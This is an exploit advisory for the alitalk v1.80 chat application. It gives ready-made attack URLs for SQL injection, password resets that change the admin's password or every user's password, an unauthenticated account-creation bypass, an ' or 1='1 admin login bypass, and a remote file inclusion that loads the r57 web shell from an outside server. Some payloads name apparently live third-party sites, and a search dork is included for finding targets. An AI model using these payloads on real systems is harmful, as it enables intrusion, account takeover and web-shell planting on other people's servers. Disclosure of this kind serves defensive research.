| # Title : alitalk v.1.80 Multiple Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : POWERED BY ALITALK | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://teh24h.ir/ ======================================= SQL INJECTION : you need to login in order to exploit this vulnerability vulnerable code on inc/receivertwo.php "; echo" r%dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d r%dtd width='19'b*%d r%dimg src=\"pix/room_user.gif\"b*%dr%d/tdb*%d r%dtd class='roomuser'b*%dr%dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%d/tdb*%d r%d/trb*%d"; $rmusr++; echo""; } .... ?> poc: http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400 PASSWORD CHANGE BYPASS : vulnerable code on functionz/usercp.php pocs: http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=algeria this will change password to "algeria" for user with uid = 1 (admin). http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=algeria this will change ALL passwords to "algeria". http://www.taoa-tanzania.com/chat/alitalk/inc/elementz.php?lilil=400&ubild=indoushka&pa=algeria USER REGISTRATION BYPASS : vulnerable code on inc/elementz.php: poc: http://target/path/inc/elementz.php?lilil=400&ubild=algeria&pa=algeria this will add an account with username=algeria and password=algeria Access Bypass : code on admin/index.php vulnerable code on functionz/first_process.php admin login page= http://target/path/admin poc: ID = an_userID' or 1='1 password = whatever L/R file inclusion : C:\web\www\alitalk\inc\elementd.php require_once('lang/'.$alitalk['lang'].'/menu.php'); Line : 31 Function : require_once Variables : $alitalk['lang'] poc : http://www.nickerie.net/chat/inc/elementd.php?alitalk[lang]=http://www.dcvi.net/r57.txt Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net ---------------------------------------------------------------------------------------------------------------